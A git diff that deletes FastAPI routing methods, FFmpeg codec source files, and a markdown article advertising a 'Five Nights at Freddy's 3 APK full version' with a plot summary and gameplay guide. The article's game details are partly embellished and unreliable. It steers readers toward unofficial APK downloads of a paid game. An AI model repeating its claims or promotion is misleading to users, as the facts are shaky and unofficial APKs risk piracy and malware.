Optional[Dict[str, Any]] = None, - generate_unique_id_function: Callable[[APIRoute], str] = Default( - generate_unique_id - ), - ) -> Callable[[DecoratedCallable], DecoratedCallable]: - return self.api_route( - path=path, - response_model=response_model, - status_code=status_code, - tags=tags, - dependencies=dependencies, - summary=summary, - description=description, - response_description=response_description, - responses=responses, - deprecated=deprecated, - methods=["PATCH"], - operation_id=operation_id, - response_model_include=response_model_include, - response_model_exclude=response_model_exclude, - response_model_by_alias=response_model_by_alias, - response_model_exclude_unset=response_model_exclude_unset, - response_model_exclude_defaults=response_model_exclude_defaults, - response_model_exclude_none=response_model_exclude_none, - include_in_schema=include_in_schema, - response_class=response_class, - name=name, - callbacks=callbacks, - openapi_extra=openapi_extra, - generate_unique_id_function=generate_unique_id_function, - ) - - def trace( - self, - path: str, - *, - response_model: Any = Default(None), - status_code: Optional[int] = None, - tags: Optional[List[Union[str, Enum]]] = None, - dependencies: Optional[Sequence[params.Depends]] = None, - summary: Optional[str] = None, - description: Optional[str] = None, - response_description: str = "Successful Response", - responses: Optional[Dict[Union[int, str], Dict[str, Any]]] = None, - deprecated: Optional[bool] = None, - operation_id: Optional[str] = None, - response_model_include: Optional[IncEx] = None, - response_model_exclude: Optional[IncEx] = None, - response_model_by_alias: bool = True, - response_model_exclude_unset: bool = False, - response_model_exclude_defaults: bool = False, - response_model_exclude_none: bool = False, - include_in_schema: bool = True, - response_class: Type[Response] = Default(JSONResponse), - name: Optional[str] = None, - callbacks: Optional[List[BaseRoute]] = None, - openapi_extra: Optional[Dict[str, Any]] = None, - generate_unique_id_function: Callable[[APIRoute], str] = Default( - generate_unique_id - ), - ) -> Callable[[DecoratedCallable], DecoratedCallable]: - return self.api_route( - path=path, - response_model=response_model, - status_code=status_code, - tags=tags, - dependencies=dependencies, - summary=summary, - description=description, - response_description=response_description, - responses=responses, - deprecated=deprecated, - methods=["TRACE"], - operation_id=operation_id, - response_model_include=response_model_include, - response_model_exclude=response_model_exclude, - response_model_by_alias=response_model_by_alias, - response_model_exclude_unset=response_model_exclude_unset, - response_model_exclude_defaults=response_model_exclude_defaults, - response_model_exclude_none=response_model_exclude_none, - include_in_schema=include_in_schema, - response_class=response_class, - name=name, - callbacks=callbacks, - openapi_extra=openapi_extra, - generate_unique_id_function=generate_unique_id_function, - ) - - def on_event( - self, event_type: str - ) -> Callable[[DecoratedCallable], DecoratedCallable]: - def decorator(func: DecoratedCallable) -> DecoratedCallable: - self.add_event_handler(event_type, func) - return func - - return decorator diff --git a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/arm/vp9dsp_init_arm.c b/spaces/colakin/video-generater/public/ffmpeg/libavcodec/arm/vp9dsp_init_arm.c deleted file mode 100644 index 
b3911f7e497a0caad686a5519d41e3926c8a5a92..0000000000000000000000000000000000000000 --- a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/arm/vp9dsp_init_arm.c +++ /dev/null @@ -1,259 +0,0 @@ -/* - * Copyright (c) 2016 Google Inc. - * - * This file is part of FFmpeg. - * - * FFmpeg is free software; you can redistribute it and/or - * modify it under the terms of the GNU Lesser General Public - * License as published by the Free Software Foundation; either - * version 2.1 of the License, or (at your option) any later version. - * - * FFmpeg is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * Lesser General Public License for more details. - * - * You should have received a copy of the GNU Lesser General Public - * License along with FFmpeg; if not, write to the Free Software - * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - */ - -#include - -#include "libavutil/attributes.h" -#include "libavutil/internal.h" -#include "libavutil/mem_internal.h" -#include "libavutil/arm/cpu.h" -#include "libavcodec/vp9dsp.h" -#include "vp9dsp_init.h" - -#define declare_fpel(type, sz) \ -void ff_vp9_##type##sz##_neon(uint8_t *dst, ptrdiff_t dst_stride, \ - const uint8_t *src, ptrdiff_t src_stride, \ - int h, int mx, int my) - -#define declare_copy_avg(sz) \ - declare_fpel(copy, sz); \ - declare_fpel(avg , sz) - -#define decl_mc_func(op, filter, dir, sz) \ -void ff_vp9_##op##_##filter##sz##_##dir##_neon(uint8_t *dst, ptrdiff_t dst_stride, \ - const uint8_t *src, ptrdiff_t src_stride, \ - int h, int mx, int my) - -#define define_8tap_2d_fn(op, filter, sz) \ -static void op##_##filter##sz##_hv_neon(uint8_t *dst, ptrdiff_t dst_stride, \ - const uint8_t *src, ptrdiff_t src_stride, \ - int h, int mx, int my) \ -{ \ - LOCAL_ALIGNED_16(uint8_t, temp, [((1 + (sz < 64)) * sz + 8) * sz]); \ - /* We only need h + 7 lines, but the horizontal filter assumes an \ - * even number of rows, so filter h + 8 lines here. 
*/ \ - ff_vp9_put_##filter##sz##_h_neon(temp, sz, \ - src - 3 * src_stride, src_stride, \ - h + 8, mx, 0); \ - ff_vp9_##op##_##filter##sz##_v_neon(dst, dst_stride, \ - temp + 3 * sz, sz, \ - h, 0, my); \ -} - -#define decl_filter_funcs(op, dir, sz) \ - decl_mc_func(op, regular, dir, sz); \ - decl_mc_func(op, sharp, dir, sz); \ - decl_mc_func(op, smooth, dir, sz) - -#define decl_mc_funcs(sz) \ - decl_filter_funcs(put, h, sz); \ - decl_filter_funcs(avg, h, sz); \ - decl_filter_funcs(put, v, sz); \ - decl_filter_funcs(avg, v, sz); \ - decl_filter_funcs(put, hv, sz); \ - decl_filter_funcs(avg, hv, sz) - -declare_copy_avg(64); -declare_copy_avg(32); -declare_copy_avg(16); -declare_copy_avg(8); -declare_copy_avg(4); - -decl_mc_funcs(64); -decl_mc_funcs(32); -decl_mc_funcs(16); -decl_mc_funcs(8); -decl_mc_funcs(4); - -#define define_8tap_2d_funcs(sz) \ - define_8tap_2d_fn(put, regular, sz) \ - define_8tap_2d_fn(put, sharp, sz) \ - define_8tap_2d_fn(put, smooth, sz) \ - define_8tap_2d_fn(avg, regular, sz) \ - define_8tap_2d_fn(avg, sharp, sz) \ - define_8tap_2d_fn(avg, smooth, sz) - -define_8tap_2d_funcs(64) -define_8tap_2d_funcs(32) -define_8tap_2d_funcs(16) -define_8tap_2d_funcs(8) -define_8tap_2d_funcs(4) - - -static av_cold void vp9dsp_mc_init_arm(VP9DSPContext *dsp) -{ - int cpu_flags = av_get_cpu_flags(); - - if (have_neon(cpu_flags)) { -#define init_fpel(idx1, idx2, sz, type) \ - dsp->mc[idx1][FILTER_8TAP_SMOOTH ][idx2][0][0] = \ - dsp->mc[idx1][FILTER_8TAP_REGULAR][idx2][0][0] = \ - dsp->mc[idx1][FILTER_8TAP_SHARP ][idx2][0][0] = \ - dsp->mc[idx1][FILTER_BILINEAR ][idx2][0][0] = ff_vp9_##type##sz##_neon - -#define init_copy_avg(idx, sz) \ - init_fpel(idx, 0, sz, copy); \ - init_fpel(idx, 1, sz, avg) - -#define init_mc_func(idx1, idx2, op, filter, fname, dir, mx, my, sz, pfx) \ - dsp->mc[idx1][filter][idx2][mx][my] = pfx##op##_##fname##sz##_##dir##_neon - -#define init_mc_funcs(idx, dir, mx, my, sz, pfx) \ - init_mc_func(idx, 0, put, FILTER_8TAP_REGULAR, regular, dir, mx, my, sz, pfx); \ - init_mc_func(idx, 0, put, FILTER_8TAP_SHARP, sharp, dir, mx, my, sz, pfx); \ - init_mc_func(idx, 0, put, FILTER_8TAP_SMOOTH, smooth, dir, mx, my, sz, pfx); \ - init_mc_func(idx, 1, avg, FILTER_8TAP_REGULAR, regular, dir, mx, my, sz, pfx); \ - init_mc_func(idx, 1, avg, FILTER_8TAP_SHARP, sharp, dir, mx, my, sz, pfx); \ - init_mc_func(idx, 1, avg, FILTER_8TAP_SMOOTH, smooth, dir, mx, my, sz, pfx) - -#define init_mc_funcs_dirs(idx, sz) \ - init_mc_funcs(idx, h, 1, 0, sz, ff_vp9_); \ - init_mc_funcs(idx, v, 0, 1, sz, ff_vp9_); \ - init_mc_funcs(idx, hv, 1, 1, sz,) - - init_copy_avg(0, 64); - init_copy_avg(1, 32); - init_copy_avg(2, 16); - init_copy_avg(3, 8); - init_copy_avg(4, 4); - - init_mc_funcs_dirs(0, 64); - init_mc_funcs_dirs(1, 32); - init_mc_funcs_dirs(2, 16); - init_mc_funcs_dirs(3, 8); - init_mc_funcs_dirs(4, 4); - } -} - -#define define_itxfm(type_a, type_b, sz) \ -void ff_vp9_##type_a##_##type_b##_##sz##x##sz##_add_neon(uint8_t *_dst, \ - ptrdiff_t stride, \ - int16_t *_block, int eob) - -#define define_itxfm_funcs(sz) \ - define_itxfm(idct, idct, sz); \ - define_itxfm(iadst, idct, sz); \ - define_itxfm(idct, iadst, sz); \ - define_itxfm(iadst, iadst, sz) - -define_itxfm_funcs(4); -define_itxfm_funcs(8); -define_itxfm_funcs(16); -define_itxfm(idct, idct, 32); -define_itxfm(iwht, iwht, 4); - - -static av_cold void vp9dsp_itxfm_init_arm(VP9DSPContext *dsp) -{ - int cpu_flags = av_get_cpu_flags(); - - if (have_neon(cpu_flags)) { -#define init_itxfm(tx, sz) \ - dsp->itxfm_add[tx][DCT_DCT] = 
ff_vp9_idct_idct_##sz##_add_neon; \ - dsp->itxfm_add[tx][DCT_ADST] = ff_vp9_iadst_idct_##sz##_add_neon; \ - dsp->itxfm_add[tx][ADST_DCT] = ff_vp9_idct_iadst_##sz##_add_neon; \ - dsp->itxfm_add[tx][ADST_ADST] = ff_vp9_iadst_iadst_##sz##_add_neon - -#define init_idct(tx, nm) \ - dsp->itxfm_add[tx][DCT_DCT] = \ - dsp->itxfm_add[tx][ADST_DCT] = \ - dsp->itxfm_add[tx][DCT_ADST] = \ - dsp->itxfm_add[tx][ADST_ADST] = ff_vp9_##nm##_add_neon - - init_itxfm(TX_4X4, 4x4); - init_itxfm(TX_8X8, 8x8); - init_itxfm(TX_16X16, 16x16); - init_idct(TX_32X32, idct_idct_32x32); - init_idct(4, iwht_iwht_4x4); - } -} - -#define define_loop_filter(dir, wd, size) \ -void ff_vp9_loop_filter_##dir##_##wd##_##size##_neon(uint8_t *dst, ptrdiff_t stride, int E, int I, int H) - -#define define_loop_filters(wd, size) \ - define_loop_filter(h, wd, size); \ - define_loop_filter(v, wd, size) - -define_loop_filters(4, 8); -define_loop_filters(8, 8); -define_loop_filters(16, 8); -define_loop_filters(16, 16); - -define_loop_filters(44, 16); - -#define lf_mix_fn(dir, wd1, wd2, stridea) \ -static void loop_filter_##dir##_##wd1##wd2##_16_neon(uint8_t *dst, \ - ptrdiff_t stride, \ - int E, int I, int H) \ -{ \ - ff_vp9_loop_filter_##dir##_##wd1##_8_neon(dst, stride, E & 0xff, I & 0xff, H & 0xff); \ - ff_vp9_loop_filter_##dir##_##wd2##_8_neon(dst + 8 * stridea, stride, E >> 8, I >> 8, H >> 8); \ -} - -#define lf_mix_fns(wd1, wd2) \ - lf_mix_fn(h, wd1, wd2, stride) \ - lf_mix_fn(v, wd1, wd2, sizeof(uint8_t)) - -lf_mix_fns(4, 8) -lf_mix_fns(8, 4) -lf_mix_fns(8, 8) - -static av_cold void vp9dsp_loopfilter_init_arm(VP9DSPContext *dsp) -{ - int cpu_flags = av_get_cpu_flags(); - - if (have_neon(cpu_flags)) { - dsp->loop_filter_8[0][1] = ff_vp9_loop_filter_v_4_8_neon; - dsp->loop_filter_8[0][0] = ff_vp9_loop_filter_h_4_8_neon; - dsp->loop_filter_8[1][1] = ff_vp9_loop_filter_v_8_8_neon; - dsp->loop_filter_8[1][0] = ff_vp9_loop_filter_h_8_8_neon; - dsp->loop_filter_8[2][1] = ff_vp9_loop_filter_v_16_8_neon; - dsp->loop_filter_8[2][0] = ff_vp9_loop_filter_h_16_8_neon; - - dsp->loop_filter_16[0] = ff_vp9_loop_filter_h_16_16_neon; - dsp->loop_filter_16[1] = ff_vp9_loop_filter_v_16_16_neon; - - dsp->loop_filter_mix2[0][0][0] = ff_vp9_loop_filter_h_44_16_neon; - dsp->loop_filter_mix2[0][0][1] = ff_vp9_loop_filter_v_44_16_neon; - dsp->loop_filter_mix2[0][1][0] = loop_filter_h_48_16_neon; - dsp->loop_filter_mix2[0][1][1] = loop_filter_v_48_16_neon; - dsp->loop_filter_mix2[1][0][0] = loop_filter_h_84_16_neon; - dsp->loop_filter_mix2[1][0][1] = loop_filter_v_84_16_neon; - dsp->loop_filter_mix2[1][1][0] = loop_filter_h_88_16_neon; - dsp->loop_filter_mix2[1][1][1] = loop_filter_v_88_16_neon; - } -} - -av_cold void ff_vp9dsp_init_arm(VP9DSPContext *dsp, int bpp) -{ - if (bpp == 10) { - ff_vp9dsp_init_10bpp_arm(dsp); - return; - } else if (bpp == 12) { - ff_vp9dsp_init_12bpp_arm(dsp); - return; - } else if (bpp != 8) - return; - - vp9dsp_mc_init_arm(dsp); - vp9dsp_loopfilter_init_arm(dsp); - vp9dsp_itxfm_init_arm(dsp); -} diff --git a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/hevc_ps_enc.c b/spaces/colakin/video-generater/public/ffmpeg/libavcodec/hevc_ps_enc.c deleted file mode 100644 index 72641b2ffb69dd26b29c0042eb03eed0c60f7dd8..0000000000000000000000000000000000000000 --- a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/hevc_ps_enc.c +++ /dev/null @@ -1,121 +0,0 @@ -/* - * HEVC Parameter Set encoding - * - * This file is part of FFmpeg. 
- * - * FFmpeg is free software; you can redistribute it and/or - * modify it under the terms of the GNU Lesser General Public - * License as published by the Free Software Foundation; either - * version 2.1 of the License, or (at your option) any later version. - * - * FFmpeg is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * Lesser General Public License for more details. - * - * You should have received a copy of the GNU Lesser General Public - * License along with FFmpeg; if not, write to the Free Software - * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - */ - -#include "put_golomb.h" -#include "hevc_ps.h" -#include "put_bits.h" - -static void write_ptl_layer(PutBitContext *pb, PTLCommon *ptl) -{ - int i; - - put_bits(pb, 2, ptl->profile_space); - put_bits(pb, 1, ptl->tier_flag); - put_bits(pb, 5, ptl->profile_idc); - for (i = 0; i < 32; i++) - put_bits(pb, 1, ptl->profile_compatibility_flag[i]); - put_bits(pb, 1, ptl->progressive_source_flag); - put_bits(pb, 1, ptl->interlaced_source_flag); - put_bits(pb, 1, ptl->non_packed_constraint_flag); - put_bits(pb, 1, ptl->frame_only_constraint_flag); - put_bits32(pb, 0); // reserved - put_bits(pb, 12, 0); // reserved -} - -static void write_ptl(PutBitContext *pb, PTL *ptl, int max_num_sub_layers) -{ - int i; - - write_ptl_layer(pb, &ptl->general_ptl); - put_bits(pb, 8, ptl->general_ptl.level_idc); - - for (i = 0; i < max_num_sub_layers - 1; i++) { - put_bits(pb, 1, ptl->sub_layer_profile_present_flag[i]); - put_bits(pb, 1, ptl->sub_layer_level_present_flag[i]); - } - - if (max_num_sub_layers > 1) - for (i = max_num_sub_layers - 1; i < 8; i++) - put_bits(pb, 2, 0); // reserved - - for (i = 0; i < max_num_sub_layers - 1; i++) { - if (ptl->sub_layer_profile_present_flag[i]) - write_ptl_layer(pb, &ptl->sub_layer_ptl[i]); - if (ptl->sub_layer_level_present_flag[i]) - put_bits(pb, 8, ptl->sub_layer_ptl[i].level_idc); - } -} - -int ff_hevc_encode_nal_vps(HEVCVPS *vps, unsigned int id, - uint8_t *buf, int buf_size) -{ - PutBitContext pb; - int i, data_size; - - init_put_bits(&pb, buf, buf_size); - put_bits(&pb, 4, id); - put_bits(&pb, 2, 3); // reserved - put_bits(&pb, 6, vps->vps_max_layers - 1); - put_bits(&pb, 3, vps->vps_max_sub_layers - 1); - put_bits(&pb, 1, vps->vps_temporal_id_nesting_flag); - put_bits(&pb, 16, 0xffff); // reserved - - write_ptl(&pb, &vps->ptl, vps->vps_max_sub_layers); - - put_bits(&pb, 1, vps->vps_sub_layer_ordering_info_present_flag); - for (i = vps->vps_sub_layer_ordering_info_present_flag ? 
0 : vps->vps_max_layers - 1; - i < vps->vps_max_sub_layers; i++) { - set_ue_golomb(&pb, vps->vps_max_dec_pic_buffering[i] - 1); - set_ue_golomb(&pb, vps->vps_num_reorder_pics[i]); - set_ue_golomb(&pb, vps->vps_max_latency_increase[i] + 1); - } - - put_bits(&pb, 6, vps->vps_max_layer_id); - set_ue_golomb(&pb, vps->vps_num_layer_sets - 1); - - if (vps->vps_num_layer_sets > 1) { - avpriv_report_missing_feature(NULL, "Writing layer_id_included_flag"); - return AVERROR_PATCHWELCOME; - } - - put_bits(&pb, 1, vps->vps_timing_info_present_flag); - if (vps->vps_timing_info_present_flag) { - put_bits32(&pb, vps->vps_num_units_in_tick); - put_bits32(&pb, vps->vps_time_scale); - put_bits(&pb, 1, vps->vps_poc_proportional_to_timing_flag); - if (vps->vps_poc_proportional_to_timing_flag) - set_ue_golomb(&pb, vps->vps_num_ticks_poc_diff_one - 1); - - set_ue_golomb(&pb, vps->vps_num_hrd_parameters); - if (vps->vps_num_hrd_parameters) { - avpriv_report_missing_feature(NULL, "Writing HRD parameters"); - return AVERROR_PATCHWELCOME; - } - } - - put_bits(&pb, 1, 0); // extension flag - - put_bits(&pb, 1, 1); // stop bit - flush_put_bits(&pb); - - data_size = put_bytes_output(&pb); - - return data_size; -} diff --git a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/jpegtabs.h b/spaces/colakin/video-generater/public/ffmpeg/libavcodec/jpegtabs.h deleted file mode 100644 index 7106f66df03cd57607126b964f9af7b7c193dc81..0000000000000000000000000000000000000000 --- a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/jpegtabs.h +++ /dev/null @@ -1,92 +0,0 @@ -/* - * MJPEG tables - * Copyright (c) 2000, 2001 Fabrice Bellard - * Copyright (c) 2003 Alex Beregszaszi - * Copyright (c) 2003-2004 Michael Niedermayer - * - * This file is part of FFmpeg. - * - * FFmpeg is free software; you can redistribute it and/or - * modify it under the terms of the GNU Lesser General Public - * License as published by the Free Software Foundation; either - * version 2.1 of the License, or (at your option) any later version. - * - * FFmpeg is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * Lesser General Public License for more details. - * - * You should have received a copy of the GNU Lesser General Public - * License along with FFmpeg; if not, write to the Free Software - * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - */ - -#ifndef AVCODEC_JPEGTABS_H -#define AVCODEC_JPEGTABS_H - -#include -#include "jpegtables.h" - -/* Set up the standard Huffman tables (cf. JPEG standard section K.3) */ -/* IMPORTANT: these are only valid for 8-bit data precision! 
*/ -const uint8_t ff_mjpeg_bits_dc_luminance[17] = -{ /* 0-base */ 0, 0, 1, 5, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0 }; -const uint8_t ff_mjpeg_val_dc[12] = -{ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11 }; - -const uint8_t ff_mjpeg_bits_dc_chrominance[17] = -{ /* 0-base */ 0, 0, 3, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0 }; - -const uint8_t ff_mjpeg_bits_ac_luminance[17] = -{ /* 0-base */ 0, 0, 2, 1, 3, 3, 2, 4, 3, 5, 5, 4, 4, 0, 0, 1, 0x7d }; -const uint8_t ff_mjpeg_val_ac_luminance[] = -{ 0x01, 0x02, 0x03, 0x00, 0x04, 0x11, 0x05, 0x12, - 0x21, 0x31, 0x41, 0x06, 0x13, 0x51, 0x61, 0x07, - 0x22, 0x71, 0x14, 0x32, 0x81, 0x91, 0xa1, 0x08, - 0x23, 0x42, 0xb1, 0xc1, 0x15, 0x52, 0xd1, 0xf0, - 0x24, 0x33, 0x62, 0x72, 0x82, 0x09, 0x0a, 0x16, - 0x17, 0x18, 0x19, 0x1a, 0x25, 0x26, 0x27, 0x28, - 0x29, 0x2a, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, - 0x3a, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, - 0x4a, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58, 0x59, - 0x5a, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69, - 0x6a, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78, 0x79, - 0x7a, 0x83, 0x84, 0x85, 0x86, 0x87, 0x88, 0x89, - 0x8a, 0x92, 0x93, 0x94, 0x95, 0x96, 0x97, 0x98, - 0x99, 0x9a, 0xa2, 0xa3, 0xa4, 0xa5, 0xa6, 0xa7, - 0xa8, 0xa9, 0xaa, 0xb2, 0xb3, 0xb4, 0xb5, 0xb6, - 0xb7, 0xb8, 0xb9, 0xba, 0xc2, 0xc3, 0xc4, 0xc5, - 0xc6, 0xc7, 0xc8, 0xc9, 0xca, 0xd2, 0xd3, 0xd4, - 0xd5, 0xd6, 0xd7, 0xd8, 0xd9, 0xda, 0xe1, 0xe2, - 0xe3, 0xe4, 0xe5, 0xe6, 0xe7, 0xe8, 0xe9, 0xea, - 0xf1, 0xf2, 0xf3, 0xf4, 0xf5, 0xf6, 0xf7, 0xf8, - 0xf9, 0xfa -}; - -const uint8_t ff_mjpeg_bits_ac_chrominance[17] = -{ /* 0-base */ 0, 0, 2, 1, 2, 4, 4, 3, 4, 7, 5, 4, 4, 0, 1, 2, 0x77 }; - -const uint8_t ff_mjpeg_val_ac_chrominance[] = -{ 0x00, 0x01, 0x02, 0x03, 0x11, 0x04, 0x05, 0x21, - 0x31, 0x06, 0x12, 0x41, 0x51, 0x07, 0x61, 0x71, - 0x13, 0x22, 0x32, 0x81, 0x08, 0x14, 0x42, 0x91, - 0xa1, 0xb1, 0xc1, 0x09, 0x23, 0x33, 0x52, 0xf0, - 0x15, 0x62, 0x72, 0xd1, 0x0a, 0x16, 0x24, 0x34, - 0xe1, 0x25, 0xf1, 0x17, 0x18, 0x19, 0x1a, 0x26, - 0x27, 0x28, 0x29, 0x2a, 0x35, 0x36, 0x37, 0x38, - 0x39, 0x3a, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, - 0x49, 0x4a, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58, - 0x59, 0x5a, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, - 0x69, 0x6a, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78, - 0x79, 0x7a, 0x82, 0x83, 0x84, 0x85, 0x86, 0x87, - 0x88, 0x89, 0x8a, 0x92, 0x93, 0x94, 0x95, 0x96, - 0x97, 0x98, 0x99, 0x9a, 0xa2, 0xa3, 0xa4, 0xa5, - 0xa6, 0xa7, 0xa8, 0xa9, 0xaa, 0xb2, 0xb3, 0xb4, - 0xb5, 0xb6, 0xb7, 0xb8, 0xb9, 0xba, 0xc2, 0xc3, - 0xc4, 0xc5, 0xc6, 0xc7, 0xc8, 0xc9, 0xca, 0xd2, - 0xd3, 0xd4, 0xd5, 0xd6, 0xd7, 0xd8, 0xd9, 0xda, - 0xe2, 0xe3, 0xe4, 0xe5, 0xe6, 0xe7, 0xe8, 0xe9, - 0xea, 0xf2, 0xf3, 0xf4, 0xf5, 0xf6, 0xf7, 0xf8, - 0xf9, 0xfa -}; -#endif diff --git a/spaces/congsaPfin/Manga-OCR/logs/Five Nights At Freddy 39s 3 Apk Full Version NEW!.md b/spaces/congsaPfin/Manga-OCR/logs/Five Nights At Freddy 39s 3 Apk Full Version NEW!.md deleted file mode 100644 index 968b1ec31beb0f50bdffade2ed3bea7b39483fcd..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/Five Nights At Freddy 39s 3 Apk Full Version NEW!.md +++ /dev/null @@ -1,144 +0,0 @@ -
    -

    Five Nights at Freddy's 3 APK Full Version: A Guide for Horror Fans

    -

    If you are a fan of horror games, you have probably heard of Five Nights at Freddy's, a series of point-and-click survival horror games that have become a cult phenomenon. The games revolve around a fictional chain of pizza restaurants called Freddy Fazbear's Pizza, where animatronic characters entertain children during the day, but become murderous at night. You play as a security guard who must survive five nights (or more) in these haunted locations, using cameras, doors, lights, and other tools to fend off the attacks of the animatronics.

    -

    five nights at freddy's 3 apk full version


    DOWNLOAD ✸✸✸ https://urlca.com/2uO7Mg



    -

    One of the most popular entries in the series is Five Nights at Freddy's 3, which was released in 2015 for Windows, Android, iOS, Nintendo Switch, PlayStation 4, and Xbox One. The game takes place thirty years after the events of the first game, in a horror-themed attraction based on the legend of Freddy Fazbear's Pizza. You face a new threat in the form of Springtrap, a decayed animatronic rabbit that roams around the attraction. You also have to deal with phantoms, hallucinations of the previous animatronics that can cause errors in your systems.

    -

    If you want to experience this terrifying game on your Android device, you can download the Five Nights at Freddy's 3 APK full version from various sources online. An APK is the Android application package format, which lets you install apps that are not available on the Google Play Store. However, before you do that, you might want to read this guide to learn more about the game, its features, its tips and tricks, its reviews, and some FAQs. Let's get started!
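
    If you already have the APK file, one common way to get it onto a phone is to sideload it over a USB debugging connection. The short Python sketch below simply wraps the standard adb commands; the file name fnaf3.apk is a placeholder rather than an official download, so point it at whatever file you actually obtained.

```python
# Illustrative sketch: sideloading an APK onto an Android device with adb.
# Assumes the Android platform tools are installed and USB debugging is on.
# "fnaf3.apk" is a placeholder file name, not an official download.
import subprocess
import sys

def sideload_apk(apk_path: str) -> None:
    # List connected devices first so a missing device fails loudly.
    devices = subprocess.run(
        ["adb", "devices"], capture_output=True, text=True, check=True
    )
    print(devices.stdout)

    # "-r" reinstalls the app while keeping its data if it is already present.
    subprocess.run(["adb", "install", "-r", apk_path], check=True)

if __name__ == "__main__":
    sideload_apk(sys.argv[1] if len(sys.argv) > 1 else "fnaf3.apk")
```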

    -

    The Plot of Five Nights at Freddy's 3

    -

    The game is set in the year 2023, thirty years after the closure of Freddy Fazbear's Pizza, the original location of the first game. A group of entrepreneurs have decided to create a horror-themed attraction called Fazbear's Fright: The Horror Attraction, based on the urban legends and rumors surrounding the pizzeria. They have collected various relics and artifacts from the old restaurants, such as masks, posters, animatronic parts, and even a security camera system.

    -

    You play as an unnamed security guard who works the night shift at the attraction, from 12 AM to 6 AM. Your job is to monitor the cameras and make sure that everything is in order. However, you soon discover that there is one animatronic that is still functional: Springtrap, a yellow rabbit suit that was used as both a costume and an animatronic by the previous owner of the pizzeria. Springtrap is possessed by the spirit of William Afton, a serial killer who murdered several children at Freddy Fazbear's Pizza and hid their bodies inside the animatronics. He is also often linked to the infamous Bite of '87, an incident in which an animatronic bit into a visitor's head and destroyed part of their frontal lobe.

    -

    -

    Springtrap is not only dangerous, but also intelligent and cunning. He can move around the attraction freely, and will try to find your office and kill you. You have to use the camera system to track his movements and lure him away from your location by playing audio clips of a child's voice. You also have to deal with the phantoms, hallucinations of the previous animatronics that can appear on your screen or in your office. They cannot harm you directly, but they can cause errors in your systems, such as disabling your ventilation, audio, or video. If this happens, you have to use the maintenance panel to reboot them as quickly as possible, or you will suffer from oxygen deprivation, audio distortion, or visual impairment.

    -

    The game has five nights (or levels) that increase in difficulty as you progress. There are also two endings: a bad ending and a good ending. The bad ending is achieved by simply completing all five nights. The good ending requires you to find and complete hidden minigames that reveal the backstory of the game and allow you to free the souls of the children that were killed by William Afton.

    -

    The Gameplay of Five Nights at Freddy's 3

    -

    The Camera System

    -

    The camera system is your main tool for surviving in Five Nights at Freddy's 3. It consists of 15 cameras that cover different areas of the attraction, such as hallways, rooms, vents, and exits. You can switch between them by clicking on their icons on a map on your screen. You can also zoom in on certain cameras by double-clicking on them.

    -

    The camera system allows you to see where Springtrap is and what he is doing. You can also use it to lure him away from your office by playing audio clips of a child's voice on certain cameras. This will make Springtrap think that there is someone there and move towards that location. However, you have to be careful not to play the audio too often or on the same camera repeatedly, or it will malfunction and stop working for a while.
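
    To make the lure-and-cooldown rule easier to picture, here is a small toy model in Python. The class name, the cooldown length, and the failure rule are invented for illustration only; the real game tunes these values internally and does not expose any such API.

```python
# Toy model of the audio-lure mechanic described above. The cooldown length
# and the failure rule are invented; the game balances these internally.
import time

class AudioLure:
    def __init__(self, cooldown_seconds: float = 5.0):
        self.cooldown = cooldown_seconds
        self.last_camera = None
        self.last_time = 0.0
        self.working = True

    def play(self, camera: int) -> bool:
        """Try to play the lure on a camera; return True if it actually played."""
        now = time.monotonic()
        if not self.working:
            return False
        too_often = (now - self.last_time) < self.cooldown
        same_cam_again = camera == self.last_camera
        if too_often or same_cam_again:
            # Overusing the lure, or spamming one camera, knocks the audio out.
            self.working = False
            return False
        self.last_camera, self.last_time = camera, now
        return True
```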

    -

    The camera system also shows you if there are any phantoms nearby. If you see one of them on your screen, you have to switch to another camera quickly or they will jump scare you and cause errors in your systems.

    -

    The Maintenance Panel

    -

    The maintenance panel is your backup tool for fixing any errors that occur in your systems. It consists of three buttons that correspond to three systems: ventilation, audio, and video. If any of these systems malfunction, you have to click on their buttons and wait for them to reboot.

    -

    The ventilation system controls the air flow in your office. If it fails, you will start to lose oxygen and hallucinate more frequently. You will also hear loud noises and see flashing lights that can distract you from Springtrap's movements.

    -

    The audio system controls the sound in your office and on the cameras. If it fails, you will not be able to hear Springtrap's footsteps or breathing, or play audio clips to lure him away. You will also hear distorted noises that can confuse you or scare you.

    -

    The video system controls the image quality on your screen and on the cameras. If it fails, you will not be able to see Springtrap's location or any phantoms clearly. You will also see static and glitches that can obscure your vision.

    -

    The maintenance panel is located on the lower right corner of your screen. You can access it by clicking on the button with a wrench icon. However, you have to be careful not to use it too often or for too long, or you will leave yourself vulnerable to Springtrap's attack. You also have to make sure that you reboot the systems in the right order, or you will waste time and risk losing more systems.
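
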